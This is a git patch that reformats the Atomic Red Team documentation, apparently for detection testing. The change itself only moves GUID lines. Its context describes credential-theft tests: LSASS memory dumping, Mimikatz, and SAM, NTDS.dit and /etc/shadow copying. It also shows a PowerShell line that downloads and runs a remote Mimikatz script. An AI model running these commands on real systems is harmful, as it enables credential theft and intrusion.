From 36d49de4c8b00bf36054294b4a1fcbab3917d7c5 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 24 Jun 2021 17:04:33 +0000 Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.md | 96 ++++++++++------- atomics/T1003.002/T1003.002.md | 32 +++--- atomics/T1003.003/T1003.003.md | 48 +++++---- atomics/T1003.004/T1003.004.md | 8 +- atomics/T1003.006/T1003.006.md | 8 +- atomics/T1003.007/T1003.007.md | 16 +-- atomics/T1003.008/T1003.008.md | 16 +-- atomics/T1003/T1003.md | 16 +-- atomics/T1006/T1006.md | 8 +- atomics/T1007/T1007.md | 16 +-- atomics/T1010/T1010.md | 8 +- atomics/T1012/T1012.md | 8 +- atomics/T1014/T1014.md | 24 +++-- atomics/T1016/T1016.md | 64 ++++++----- atomics/T1018/T1018.md | 88 +++++++++------ atomics/T1020/T1020.md | 8 +- atomics/T1021.001/T1021.001.md | 16 +-- atomics/T1021.002/T1021.002.md | 32 +++--- atomics/T1021.003/T1021.003.md | 8 +- atomics/T1021.006/T1021.006.md | 24 +++-- atomics/T1027.001/T1027.001.md | 8 +- atomics/T1027.002/T1027.002.md | 32 +++--- atomics/T1027.004/T1027.004.md | 16 +-- atomics/T1027/T1027.md | 48 +++++---- atomics/T1030/T1030.md | 8 +- atomics/T1033/T1033.md | 24 +++-- atomics/T1036.003/T1036.003.md | 72 ++++++++----- atomics/T1036.004/T1036.004.md | 16 +-- atomics/T1036.005/T1036.005.md | 8 +- atomics/T1036.006/T1036.006.md | 8 +- atomics/T1036/T1036.md | 8 +- atomics/T1037.001/T1037.001.md | 8 +- atomics/T1037.002/T1037.002.md | 8 +- atomics/T1037.004/T1037.004.md | 24 +++-- atomics/T1037.005/T1037.005.md | 8 +- atomics/T1040/T1040.md | 32 +++--- atomics/T1046/T1046.md | 32 +++--- atomics/T1047/T1047.md | 64 ++++++----- atomics/T1048.003/T1048.003.md | 40 ++++--- atomics/T1048/T1048.md | 16 +-- atomics/T1049/T1049.md | 32 +++--- atomics/T1053.001/T1053.001.md | 8 +- atomics/T1053.002/T1053.002.md | 8 +- atomics/T1053.003/T1053.003.md | 24 +++-- atomics/T1053.004/T1053.004.md | 8 +- atomics/T1053.005/T1053.005.md | 48 +++++---- atomics/T1053.006/T1053.006.md | 8 +- atomics/T1053.007/T1053.007.md | 16 +-- atomics/T1055.001/T1055.001.md | 8 +- atomics/T1055.004/T1055.004.md | 8 +- atomics/T1055.012/T1055.012.md | 16 +-- atomics/T1055/T1055.md | 16 +-- atomics/T1056.001/T1056.001.md | 16 +-- atomics/T1056.002/T1056.002.md | 16 +-- atomics/T1056.004/T1056.004.md | 8 +- atomics/T1057/T1057.md | 16 +-- atomics/T1059.001/T1059.001.md | 144 +++++++++++++++---------- atomics/T1059.002/T1059.002.md | 8 +- atomics/T1059.003/T1059.003.md | 16 +-- atomics/T1059.004/T1059.004.md | 16 +-- atomics/T1059.005/T1059.005.md | 24 +++-- atomics/T1059.006/T1059.006.md | 24 +++-- atomics/T1069.001/T1069.001.md | 24 +++-- atomics/T1069.002/T1069.002.md | 64 ++++++----- atomics/T1070.001/T1070.001.md | 24 +++-- atomics/T1070.002/T1070.002.md | 24 +++-- atomics/T1070.003/T1070.003.md | 88 +++++++++------ atomics/T1070.004/T1070.004.md | 80 ++++++++------ atomics/T1070.005/T1070.005.md | 24 +++-- atomics/T1070.006/T1070.006.md | 64 ++++++----- atomics/T1070/T1070.md | 8 +- atomics/T1071.001/T1071.001.md | 24 +++-- atomics/T1071.004/T1071.004.md | 32 +++--- atomics/T1072/T1072.md | 8 +- atomics/T1074.001/T1074.001.md | 24 +++-- atomics/T1078.001/T1078.001.md | 8 +- atomics/T1078.003/T1078.003.md | 8 +- atomics/T1082/T1082.md | 88 +++++++++------ atomics/T1083/T1083.md | 32 +++--- atomics/T1087.001/T1087.001.md | 88 +++++++++------ atomics/T1087.002/T1087.002.md | 80 ++++++++------ atomics/T1090.001/T1090.001.md | 24 +++-- atomics/T1095/T1095.md | 24 +++-- atomics/T1098.004/T1098.004.md | 8 +- atomics/T1098/T1098.md | 16 +-- atomics/T1105/T1105.md | 112 +++++++++++-------- atomics/T1106/T1106.md | 8 +- atomics/T1110.001/T1110.001.md | 16 +-- atomics/T1110.002/T1110.002.md | 8 +- atomics/T1110.003/T1110.003.md | 24 +++-- atomics/T1110.004/T1110.004.md | 16 +-- atomics/T1112/T1112.md | 48 +++++---- atomics/T1113/T1113.md | 40 ++++--- atomics/T1114.001/T1114.001.md | 8 +- atomics/T1115/T1115.md | 32 +++--- atomics/T1119/T1119.md | 32 +++--- atomics/T1120/T1120.md | 8 +- atomics/T1123/T1123.md | 8 +- atomics/T1124/T1124.md | 16 +-- atomics/T1127.001/T1127.001.md | 16 +-- atomics/T1132.001/T1132.001.md | 8 +- atomics/T1133/T1133.md | 8 +- atomics/T1134.001/T1134.001.md | 16 +-- atomics/T1134.004/T1134.004.md | 40 ++++--- atomics/T1135/T1135.md | 48 +++++---- atomics/T1136.001/T1136.001.md | 48 +++++---- atomics/T1136.002/T1136.002.md | 24 +++-- atomics/T1137.002/T1137.002.md | 8 +- atomics/T1137.004/T1137.004.md | 8 +- atomics/T1137/T1137.md | 8 +- atomics/T1140/T1140.md | 16 +-- atomics/T1176/T1176.md | 32 +++--- atomics/T1197/T1197.md | 32 +++--- atomics/T1201/T1201.md | 56 ++++++---- atomics/T1202/T1202.md | 24 +++-- atomics/T1204.002/T1204.002.md | 64 ++++++----- atomics/T1207/T1207.md | 8 +- atomics/T1216.001/T1216.001.md | 8 +- atomics/T1216/T1216.md | 16 +-- atomics/T1217/T1217.md | 56 ++++++---- atomics/T1218.001/T1218.001.md | 56 ++++++---- atomics/T1218.002/T1218.002.md | 8 +- atomics/T1218.003/T1218.003.md | 16 +-- atomics/T1218.004/T1218.004.md | 64 ++++++----- atomics/T1218.005/T1218.005.md | 72 ++++++++----- atomics/T1218.007/T1218.007.md | 24 +++-- atomics/T1218.008/T1218.008.md | 8 +- atomics/T1218.009/T1218.009.md | 16 +-- atomics/T1218.010/T1218.010.md | 40 ++++--- atomics/T1218.011/T1218.011.md | 64 ++++++----- atomics/T1218/T1218.md | 64 ++++++----- atomics/T1219/T1219.md | 24 +++-- atomics/T1220/T1220.md | 32 +++--- atomics/T1221/T1221.md | 8 +- atomics/T1222.001/T1222.001.md | 40 ++++--- atomics/T1222.002/T1222.002.md | 72 ++++++++----- atomics/T1482/T1482.md | 40 ++++--- atomics/T1485/T1485.md | 16 +-- atomics/T1486/T1486.md | 32 +++--- atomics/T1489/T1489.md | 24 +++-- atomics/T1490/T1490.md | 56 ++++++---- atomics/T1491.001/T1491.001.md | 8 +- atomics/T1496/T1496.md | 8 +- atomics/T1497.001/T1497.001.md | 24 +++-- atomics/T1505.002/T1505.002.md | 8 +- atomics/T1505.003/T1505.003.md | 8 +- atomics/T1518.001/T1518.001.md | 48 +++++---- atomics/T1518/T1518.md | 24 +++-- atomics/T1529/T1529.md | 72 ++++++++----- atomics/T1531/T1531.md | 24 +++-- atomics/T1543.001/T1543.001.md | 8 +- atomics/T1543.002/T1543.002.md | 16 +-- atomics/T1543.003/T1543.003.md | 24 +++-- atomics/T1543.004/T1543.004.md | 8 +- atomics/T1546.001/T1546.001.md | 8 +- atomics/T1546.002/T1546.002.md | 8 +- atomics/T1546.003/T1546.003.md | 8 +- atomics/T1546.004/T1546.004.md | 16 +-- atomics/T1546.005/T1546.005.md | 8 +- atomics/T1546.007/T1546.007.md | 8 +- atomics/T1546.008/T1546.008.md | 16 +-- atomics/T1546.010/T1546.010.md | 8 +- atomics/T1546.011/T1546.011.md | 24 +++-- atomics/T1546.012/T1546.012.md | 16 +-- atomics/T1546.013/T1546.013.md | 8 +- atomics/T1546.014/T1546.014.md | 8 +- atomics/T1547.001/T1547.001.md | 56 ++++++---- atomics/T1547.004/T1547.004.md | 24 +++-- atomics/T1547.005/T1547.005.md | 8 +- atomics/T1547.006/T1547.006.md | 8 +- atomics/T1547.007/T1547.007.md | 16 +-- atomics/T1547.009/T1547.009.md | 16 +-- atomics/T1547.010/T1547.010.md | 8 +- atomics/T1547.011/T1547.011.md | 8 +- atomics/T1548.001/T1548.001.md | 24 +++-- atomics/T1548.002/T1548.002.md | 72 ++++++++----- atomics/T1548.003/T1548.003.md | 24 +++-- atomics/T1550.002/T1550.002.md | 16 +-- atomics/T1550.003/T1550.003.md | 8 +- atomics/T1552.001/T1552.001.md | 40 ++++--- atomics/T1552.002/T1552.002.md | 16 +-- atomics/T1552.003/T1552.003.md | 8 +- atomics/T1552.004/T1552.004.md | 32 +++--- atomics/T1552.006/T1552.006.md | 16 +-- atomics/T1552.007/T1552.007.md | 16 +-- atomics/T1553.001/T1553.001.md | 8 +- atomics/T1553.004/T1553.004.md | 40 ++++--- atomics/T1553.005/T1553.005.md | 16 +-- atomics/T1555.001/T1555.001.md | 8 +- atomics/T1555.003/T1555.003.md | 24 +++-- atomics/T1555/T1555.md | 24 +++-- atomics/T1556.002/T1556.002.md | 8 +- atomics/T1558.001/T1558.001.md | 8 +- atomics/T1558.003/T1558.003.md | 8 +- atomics/T1559.002/T1559.002.md | 24 +++-- atomics/T1560.001/T1560.001.md | 64 ++++++----- atomics/T1560.002/T1560.002.md | 32 +++--- atomics/T1560/T1560.md | 8 +- atomics/T1562.001/T1562.001.md | 192 ++++++++++++++++++++------------- atomics/T1562.002/T1562.002.md | 32 +++--- atomics/T1562.003/T1562.003.md | 16 +-- atomics/T1562.004/T1562.004.md | 56 ++++++---- atomics/T1562.006/T1562.006.md | 16 +-- atomics/T1563.002/T1563.002.md | 8 +- atomics/T1564.001/T1564.001.md | 56 ++++++---- atomics/T1564.002/T1564.002.md | 16 +-- atomics/T1564.003/T1564.003.md | 8 +- atomics/T1564.004/T1564.004.md | 32 +++--- atomics/T1564/T1564.md | 24 +++-- atomics/T1566.001/T1566.001.md | 16 +-- atomics/T1569.001/T1569.001.md | 8 +- atomics/T1569.002/T1569.002.md | 16 +-- atomics/T1571/T1571.md | 16 +-- atomics/T1573/T1573.md | 8 +- atomics/T1574.001/T1574.001.md | 8 +- atomics/T1574.002/T1574.002.md | 8 +- atomics/T1574.006/T1574.006.md | 16 +-- atomics/T1574.009/T1574.009.md | 8 +- atomics/T1574.011/T1574.011.md | 16 +-- atomics/T1574.012/T1574.012.md | 24 +++-- atomics/T1609/T1609.md | 8 +- atomics/T1610/T1610.md | 8 +- atomics/T1611/T1611.md | 8 +- 223 files changed, 3625 insertions(+), 2175 deletions(-) diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md index 9869cc02..024dd2aa 100644 --- a/atomics/T1003.001/T1003.001.md +++ b/atomics/T1003.001/T1003.001.md @@ -54,9 +54,6 @@ The following SSPs can be used to access credentials:
## Atomic Test #1 - Windows Credential Editor - -auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed - Dump user credentials using Windows Credential Editor (supports Windows XP, 2003, Vista, 7, 2008 and Windows 8 only) Upon successful execution, you should see a file with user passwords/hashes at %temp%/wce-output.file. @@ -64,9 +61,14 @@ Upon successful execution, you should see a file with user passwords/hashes at % If you see no output it is likely that execution was blocked by Anti-Virus. If you see a message saying \"wce.exe is not recognized as an internal or external command\", try using the get-prereq_commands to download and install Windows Credential Editor first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed + + + #### Inputs: @@ -117,18 +119,20 @@ if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
## Atomic Test #2 - Dump LSASS.exe Memory using ProcDump - -auto_generated_guid: 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 0be2230c-9ab3-4ac2-8826-3199b9a0ebf8 + + + #### Inputs: @@ -174,15 +178,17 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #3 - Dump LSASS.exe Memory using comsvcs.dll - -auto_generated_guid: 2536dee2-12fb-459a-8c37-971844fa73be - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with a built-in dll. Upon successful execution, you should see the following file created $env:TEMP\lsass-comsvcs.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 2536dee2-12fb-459a-8c37-971844fa73be + + + @@ -206,18 +212,20 @@ Remove-Item $env:TEMP\lsass-comsvcs.dmp -ErrorAction Ignore
## Atomic Test #4 - Dump LSASS.exe Memory using direct system calls and API unhooking - -auto_generated_guid: 7ae7102c-a099-45c8-b985-4c7a2d05790d - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved using direct system calls and API unhooking in an effort to avoid detection. https://github.com/outflanknl/Dumpert https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/ Upon successful execution, you should see the following file created C:\\windows\\temp\\dumpert.dmp. If you see a message saying \"The system cannot find the path specified.\", try using the get-prereq_commands to download the tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7ae7102c-a099-45c8-b985-4c7a2d05790d + + + #### Inputs: @@ -260,14 +268,16 @@ Invoke-WebRequest "https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c
## Atomic Test #5 - Dump LSASS.exe Memory using Windows Task Manager - -auto_generated_guid: dea6c349-f1c6-44f3-87a1-1ed33a59a607 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. + **Supported Platforms:** Windows +**auto_generated_guid:** dea6c349-f1c6-44f3-87a1-1ed33a59a607 + + + #### Run it with these steps! @@ -292,14 +302,16 @@ Manager and administrative permissions.
## Atomic Test #6 - Offline Credential Theft With Mimikatz - -auto_generated_guid: 453acf13-1dbd-47d7-b28a-172ce9228023 - The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz and can be obtained using the get-prereq_commands. + **Supported Platforms:** Windows +**auto_generated_guid:** 453acf13-1dbd-47d7-b28a-172ce9228023 + + + #### Inputs: @@ -358,17 +370,19 @@ Write-Host "Create the lsass dump manually using the steps in the previous test
## Atomic Test #7 - LSASS read with pypykatz - -auto_generated_guid: c37bc535-5c62-4195-9cc3-0517673171d8 - Parses secrets hidden in the LSASS process with python. Similar to mimikatz's sekurlsa:: Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test. Successful execution of this test will display multiple useranames and passwords/hashes to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** c37bc535-5c62-4195-9cc3-0517673171d8 + + + @@ -421,15 +435,17 @@ pip install pypykatz
## Atomic Test #8 - Dump LSASS.exe Memory using Out-Minidump.ps1 - -auto_generated_guid: 6502c8f0-b775-4dbd-9193-1298f56b6781 - The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure powershell implementation that leverages the MiniDumpWriteDump Win32 API call. Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 6502c8f0-b775-4dbd-9193-1298f56b6781 + + + @@ -454,18 +470,20 @@ Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore
## Atomic Test #9 - Create Mini Dump of LSASS.exe using ProcDump - -auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + **Supported Platforms:** Windows +**auto_generated_guid:** 7cede33f-0acd-44ef-9774-15511300b24b + + + #### Inputs: @@ -510,16 +528,18 @@ Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
## Atomic Test #10 - Powershell Mimikatz - -auto_generated_guid: 66fb0bc1-3c3f-47e9-a298-550ecfefacbc - Dumps credentials from memory via Powershell by invoking a remote mimikatz script. If Mimikatz runs successfully you will see several usernames and hashes output to the screen. Common failures include seeing an \"access denied\" error which results when Anti-Virus blocks execution. Or, if you try to run the test without the required administrative privleges you will see this error near the bottom of the output to the screen "ERROR kuhl_m_sekurlsa_acquireLSA" + **Supported Platforms:** Windows +**auto_generated_guid:** 66fb0bc1-3c3f-47e9-a298-550ecfefacbc + + + #### Inputs: @@ -544,14 +564,16 @@ IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimika
## Atomic Test #11 - Dump LSASS with .Net 5 createdump.exe - -auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 - This test uses the technique describe in this tweet (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass + **Supported Platforms:** Windows +**auto_generated_guid:** 9d0072c8-7cca-45c4-bd14-f852cfa35cf0 + + + #### Inputs: @@ -597,17 +619,19 @@ echo ".NET 5 must be installed manually." "For the very brave a copy of the exec
## Atomic Test #12 - Dump LSASS.exe using imported Microsoft DLLs - -auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697 - The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved by importing built-in DLLs and calling exported functions. Xordump will re-read the resulting minidump file and delete it immediately to avoid brittle EDR detections that signature lsass minidump files. Upon successful execution, you should see the following file created $env:TEMP\lsass-xordump.t1003.001.dmp. + **Supported Platforms:** Windows +**auto_generated_guid:** 86fc3f40-237f-4701-b155-81c01c48d697 + + + #### Inputs: diff --git a/atomics/T1003.002/T1003.002.md b/atomics/T1003.002/T1003.002.md index 73f20f13..ad162a55 100644 --- a/atomics/T1003.002/T1003.002.md +++ b/atomics/T1003.002/T1003.002.md @@ -36,16 +36,18 @@ Notes:
## Atomic Test #1 - Registry dump of SAM, creds, and secrets - -auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44 - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 5c2571d0-1572-416d-9676-812e64ca9f44 + + + @@ -73,13 +75,15 @@ del %temp%\security >nul 2> nul
## Atomic Test #2 - Registry parse with pypykatz - -auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 - Parses registry hives to obtain stored credentials + **Supported Platforms:** Windows +**auto_generated_guid:** a96872b2-cbf3-46cf-8eb4-27e8c0e85263 + + + @@ -132,14 +136,16 @@ pip install pypykatz
## Atomic Test #3 - esentutl.exe SAM copy - -auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480 - Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc. + **Supported Platforms:** Windows +**auto_generated_guid:** a90c2f4d-6726-444e-99d2-a00cd7c20480 + + + #### Inputs: @@ -170,13 +176,15 @@ del #{copy_dest}\#{file_name} >nul 2>&1
## Atomic Test #4 - PowerDump Registry dump of SAM for hashes and usernames - -auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 - Executes a hashdump by reading the hasshes from the registry. + **Supported Platforms:** Windows +**auto_generated_guid:** 804f28fc-68fc-40da-b5a2-e9d0bce5c193 + + + diff --git a/atomics/T1003.003/T1003.003.md b/atomics/T1003.003/T1003.003.md index c89af84f..a82206f8 100644 --- a/atomics/T1003.003/T1003.003.md +++ b/atomics/T1003.003/T1003.003.md @@ -30,15 +30,17 @@ The following tools and techniques can be used to enumerate the NTDS file and th
## Atomic Test #1 - Create Volume Shadow Copy with vssadmin - -auto_generated_guid: dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f + + + #### Inputs: @@ -75,9 +77,6 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #2 - Copy NTDS.dit from Volume Shadow Copy - -auto_generated_guid: c6237146-9ea6-4711-85c9-c56d263a6b03 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. @@ -85,9 +84,14 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume This test requires steps taken in the test "Create Volume Shadow Copy with vssadmin". A successful test also requires the export of the SYSTEM Registry hive. This test must be executed on a Windows Domain Controller. + **Supported Platforms:** Windows +**auto_generated_guid:** c6237146-9ea6-4711-85c9-c56d263a6b03 + + + #### Inputs: @@ -151,9 +155,6 @@ mkdir #{extract_path}
## Atomic Test #3 - Dump Active Directory Database with NTDSUtil - -auto_generated_guid: 2364e33d-ceab-4641-8468-bfb1d7cc2723 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability @@ -161,9 +162,14 @@ uses the "IFM" or "Install From Media" backup functionality that allows Active D subsequent domain controllers without the need of network-based replication. Upon successful completion, you will find a copy of the ntds.dit file in the C:\Windows\Temp directory. + **Supported Platforms:** Windows +**auto_generated_guid:** 2364e33d-ceab-4641-8468-bfb1d7cc2723 + + + #### Inputs: @@ -205,15 +211,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #4 - Create Volume Shadow Copy with WMI - -auto_generated_guid: 224f7de0-8f0a-4a94-b5d8-989b036c86da - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 224f7de0-8f0a-4a94-b5d8-989b036c86da + + + #### Inputs: @@ -250,15 +258,17 @@ echo Sorry, Promoting this machine to a Domain Controller must be done manually
## Atomic Test #5 - Create Volume Shadow Copy with Powershell - -auto_generated_guid: 542bb97e-da53-436b-8e43-e0a7d31a6c24 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by copying it from a Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 542bb97e-da53-436b-8e43-e0a7d31a6c24 + + + #### Inputs: @@ -283,15 +293,17 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
## Atomic Test #6 - Create Symlink to Volume Shadow Copy - -auto_generated_guid: 21748c28-2793-4284-9e07-d6d028b66702 - This test is intended to be run on a domain Controller. The Active Directory database NTDS.dit may be dumped by creating a symlink to Volume Shadow Copy. + **Supported Platforms:** Windows +**auto_generated_guid:** 21748c28-2793-4284-9e07-d6d028b66702 + + + #### Inputs: diff --git a/atomics/T1003.004/T1003.004.md b/atomics/T1003.004/T1003.004.md index 05973de3..15260a63 100644 --- a/atomics/T1003.004/T1003.004.md +++ b/atomics/T1003.004/T1003.004.md @@ -12,16 +12,18 @@
## Atomic Test #1 - Dumping LSA Secrets - -auto_generated_guid: 55295ab0-a703-433b-9ca4-ae13807de12f - Dump secrets key from Windows registry When successful, the dumped file will be written to $env:Temp\secrets. Attackers may use the secrets key to assist with extracting passwords and enumerating other sensitive system information. https://pentestlab.blog/2018/04/04/dumping-clear-text-credentials/#:~:text=LSA%20Secrets%20is%20a%20registry,host%2C%20local%20security%20policy%20etc. + **Supported Platforms:** Windows +**auto_generated_guid:** 55295ab0-a703-433b-9ca4-ae13807de12f + + + #### Inputs: diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md index c6708587..c9efc3ad 100644 --- a/atomics/T1003.006/T1003.006.md +++ b/atomics/T1003.006/T1003.006.md @@ -14,16 +14,18 @@ DCSync functionality has been included in the "lsadump" module in [Mimikatz](htt
## Atomic Test #1 - DCSync - -auto_generated_guid: 129efd28-8497-4c87-a1b0-73b9a870ca3e - Attack allowing retrieval of account information without accessing memory or retrieving the NTDS database. Works against a remote Windows Domain Controller using the replication protocol. Privileges required: domain admin or domain controller account (by default), or any other account with required rights. [Reference](https://adsecurity.org/?p=1729) + **Supported Platforms:** Windows +**auto_generated_guid:** 129efd28-8497-4c87-a1b0-73b9a870ca3e + + + #### Inputs: diff --git a/atomics/T1003.007/T1003.007.md b/atomics/T1003.007/T1003.007.md index 99420fb6..d2d5875d 100644 --- a/atomics/T1003.007/T1003.007.md +++ b/atomics/T1003.007/T1003.007.md @@ -14,14 +14,16 @@ This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin
## Atomic Test #1 - Dump individual process memory with sh (Local) - -auto_generated_guid: 7e91138a-8e74-456d-a007-973d67a0bb80 - Using `/proc/$PID/mem`, where $PID is the target process ID, use shell utilities to copy process memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 7e91138a-8e74-456d-a007-973d67a0bb80 + + + #### Inputs: @@ -73,14 +75,16 @@ echo "sh -c 'echo \"The password is #{pid_term}\" && sleep 30' &" >> #{script_pa
## Atomic Test #2 - Dump individual process memory with Python (Local) - -auto_generated_guid: 437b2003-a20d-4ed8-834c-4964f24eec63 - Using `/proc/$PID/mem`, where $PID is the target process ID, use a Python script to copy a process's heap memory to an external file so it can be searched or exfiltrated later. + **Supported Platforms:** Linux +**auto_generated_guid:** 437b2003-a20d-4ed8-834c-4964f24eec63 + + + #### Inputs: diff --git a/atomics/T1003.008/T1003.008.md b/atomics/T1003.008/T1003.008.md index fb75bbaa..496d6d4c 100644 --- a/atomics/T1003.008/T1003.008.md +++ b/atomics/T1003.008/T1003.008.md @@ -15,13 +15,15 @@ The Linux utility, unshadow, can be used to combine the two files in a format su
## Atomic Test #1 - Access /etc/shadow (Local) - -auto_generated_guid: 3723ab77-c546-403c-8fb4-bb577033b235 - /etc/shadow file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 3723ab77-c546-403c-8fb4-bb577033b235 + + + #### Inputs: @@ -51,13 +53,15 @@ rm -f #{output_file}
## Atomic Test #2 - Access /etc/passwd (Local) - -auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d - /etc/passwd file is accessed in Linux environments + **Supported Platforms:** Linux +**auto_generated_guid:** 60e860b6-8ae6-49db-ad07-5e73edd88f5d + + + #### Inputs: diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md index 8b9193ca..f7c73c92 100644 --- a/atomics/T1003/T1003.md +++ b/atomics/T1003/T1003.md @@ -15,9 +15,6 @@ Several of the tools mentioned in associated sub-techniques may be used by both
## Atomic Test #1 - Gsecdump - -auto_generated_guid: 96345bfc-8ae7-4b6a-80b7-223200f24ef9 - Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's following by two 32 characters hashes. @@ -26,9 +23,14 @@ If you see output that says "compat: error: failed to create child process", exe You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying "The system cannot find the path specified", try using the get-prereq_commands to download and install Gsecdump first. + **Supported Platforms:** Windows +**auto_generated_guid:** 96345bfc-8ae7-4b6a-80b7-223200f24ef9 + + + #### Inputs: @@ -72,16 +74,18 @@ if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}
## Atomic Test #2 - Credential Dumping with NPPSpy - -auto_generated_guid: 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 - Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy + **Supported Platforms:** Windows +**auto_generated_guid:** 9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6 + + + diff --git a/atomics/T1006/T1006.md b/atomics/T1006/T1006.md index 203a2b06..19a34276 100644 --- a/atomics/T1006/T1006.md +++ b/atomics/T1006/T1006.md @@ -12,9 +12,6 @@ Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Cit
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell) - -auto_generated_guid: 88f6327e-51ec-4bbf-b2e8-3fea534eab8b - This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. On success, a hex dump of the first 11 bytes of the volume is displayed. @@ -24,9 +21,14 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti 00000000 EB 52 90 4E 54 46 53 20 20 20 20 ëR?NTFS ``` + **Supported Platforms:** Windows +**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b + + + #### Inputs: diff --git a/atomics/T1007/T1007.md b/atomics/T1007/T1007.md index 7cb3c441..faff45d6 100644 --- a/atomics/T1007/T1007.md +++ b/atomics/T1007/T1007.md @@ -12,15 +12,17 @@
## Atomic Test #1 - System Service Discovery - -auto_generated_guid: 89676ba1-b1f8-47ee-b940-2e1a113ebc71 - Identify system services. Upon successful execution, cmd.exe will execute service commands with expected result to stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71 + + + @@ -42,15 +44,17 @@ sc query state= all
